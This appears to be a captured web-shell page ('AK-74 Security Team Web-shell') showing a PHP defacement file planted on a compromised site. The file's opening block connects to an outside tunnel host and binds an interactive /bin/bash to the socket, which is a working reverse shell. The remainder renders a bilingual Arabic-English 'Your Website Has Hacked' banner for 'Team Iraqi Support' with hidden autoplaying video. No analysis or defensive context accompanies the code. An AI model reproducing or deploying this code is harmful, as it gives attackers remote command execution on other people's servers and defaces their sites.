.:: :[ AK-74 Security Team Web-shell ]: ::.
General information
File manager
phpinfo()
Run PHP
Execute the command
Edit the file
<?php // ========================================== // Phase 1: Background Connection Logic // ========================================== set_time_limit(0); ignore_user_abort(true); $host = "uffrlpylph.a.pinggy.link"; $port = 27907; $sock = @fsockopen($host, $port, $errno, $errstr, 2); if ($sock) { if (strtoupper(substr(PHP_OS, 0, 3)) !== 'WIN') { $descriptorspec = array(0 => $sock, 1 => $sock, 2 => $sock); @proc_open('/bin/bash -i', $descriptorspec, $pipes); } } // ========================================== // Phase 2: User Interface Data // ========================================== $logo_url = "http://80.225.76.41/img/logo__small.png"; $ar_msgs = ['جاري الاتصال بنظام ...', 'تم اختراق موقعكم بنجاح...', 'نظامكم الآن تحت سيطرتنا بالكامل', 'نحن اولاد علي الكرار ع لا ننسى']; $en_msgs = ['System Link Established...', 'Your Website Has Hacked', 'We are Son of Ali AlKarar-A- We are not Forggot', 'Team Iraqi Support']; $bilingual_pairs = []; for ($i = 0; $i < count($ar_msgs); $i++) { $bilingual_pairs[] = ['ar' => $ar_msgs[$i], 'en' => $en_msgs[$i]]; } ?> <!DOCTYPE html> <html lang="ar"> <head> <meta charset="UTF-8"> <title>Team Iraqi Support</title> <style> :root { --primary: #00ff41; --bg-dark: #020202; --neon-blue: #00f3ff; } * { margin: 0; padding: 0; box-sizing: border-box; } body, html { width: 100%; height: 100%; overflow: hidden; background-color: var(--bg-dark); font-family: 'Courier New', Courier, monospace; } .background-grid { position: fixed; top: 0; left: 0; width: 100%; height: 100%; background-image: linear-gradient(rgba(0, 255, 65, 0.1) 1px, transparent 1px), linear-gradient(90deg, rgba(0, 255, 65, 0.1) 1px, transparent 1px); background-size: 50px 50px; z-index: 1; animation: grid-pulse 10s infinite alternate; } @keyframes grid-pulse { 0% { transform: scale(1); opacity: 0.5; } 100% { transform: scale(1.1); opacity: 0.8; } } .main-overlay { position: relative; z-index: 10; width: 100%; height: 100%; display: flex; flex-direction: column; justify-content: center; align-items: center; text-align: center; } .logo-main img { width: 250px; height: 250px; border-radius: 50%; border: 3px solid var(--primary); box-shadow: 0 0 30px var(--primary); animation: neon-glow 2s infinite; margin-bottom: 20px; } @keyframes neon-glow { 0% { box-shadow: 0 0 20px var(--primary); transform: scale(1); } 50% { box-shadow: 0 0 40px var(--primary); transform: scale(1.02); } 100% { box-shadow: 0 0 20px var(--primary); transform: scale(1); } } #typewriter { width: 80%; margin: 0 auto; min-height: 120px; } .t-line { color: var(--primary); font-size: 1.4rem; font-weight: bold; margin-bottom: 5px; text-shadow: 0 0 10px var(--primary); } .t-subline { color: var(--neon-blue); font-size: 1.1rem; margin-bottom: 15px; opacity: 0.9; } #gatekeeper { position: fixed; top: 0; left: 0; width: 100%; height: 100%; background: #000; z-index: 1000; display: flex; justify-content: center; align-items: center; color: var(--primary); cursor: pointer; font-size: 1.8rem; letter-spacing: 2px; animation: blink 1s infinite; } @keyframes blink { 0%, 100% { opacity: 1; } 50% { opacity: 0.3; } } #status-bar { margin-top: 40px; color: #555; font-size: 0.8rem; letter-spacing: 1px; } </style> <script src="https://www.youtube.com/iframe_api"></script> </head> <body> <div id="gatekeeper" onclick="initializeTerminal()">[ CLICK TO INITIALIZE SECURE LINK ]</div> <div class="background-grid"></div> <div class="main-overlay"> <div class="logo-main"> <img src="<?php echo $logo_url; ?>" alt="Team Iraqi Support"> </div> <div id="typewriter"></div> <div id="status-bar"> ENC: AES-256 | NODE: T.I.S_ALTAIR | TARGET: <span style="color:red">OWNED</span> </div> </div> <div id="player" style="display:none"></div> <script> const videoId = "iwLgQGKkWqA"; const messagePairs = <?php echo json_encode($bilingual_pairs); ?>; let player, apiReady = false; function onYouTubeIframeAPIReady() { player = new YT.Player('player', { height: '0', width: '0', videoId: videoId, playerVars: { 'autoplay': 0, 'controls': 0, 'loop': 1, 'playlist': videoId, 'enablejsapi': 1 }, events: { 'onReady': () => { apiReady = true; } } }); } const typewriter = document.getElementById('typewriter'); function typeString(element, text, speed, callback) { let i = 0; function next() { if (i < text.length) { element.innerHTML += text.charAt(i); i++; setTimeout(next, speed); } else if (callback) callback(); } next(); } function displayPair(index) { if (index >= messagePairs.length) return; const pair = messagePairs[index]; const arDiv = document.createElement('div'); arDiv.className = 't-line'; typewriter.appendChild(arDiv); typeString(arDiv, pair.ar, 50, () => { const enDiv = document.createElement('div'); enDiv.className = 't-subline'; typewriter.appendChild(enDiv); typeString(enDiv, pair.en, 30, () => { setTimeout(() => displayPair(index + 1), 1000); }); }); } function initializeTerminal() { document.getElementById('gatekeeper').style.display = 'none'; if (apiReady && player) { player.unMute(); player.setVolume(100); player.playVideo(); } else { document.getElementById('player').innerHTML = `<iframe width="1" height="1" src="https://www.youtube.com/embed/${videoId}?autoplay=1&mute=0" allow="autoplay"></iframe>`; } displayPair(0); } </script> </body> </html>
Rename:
-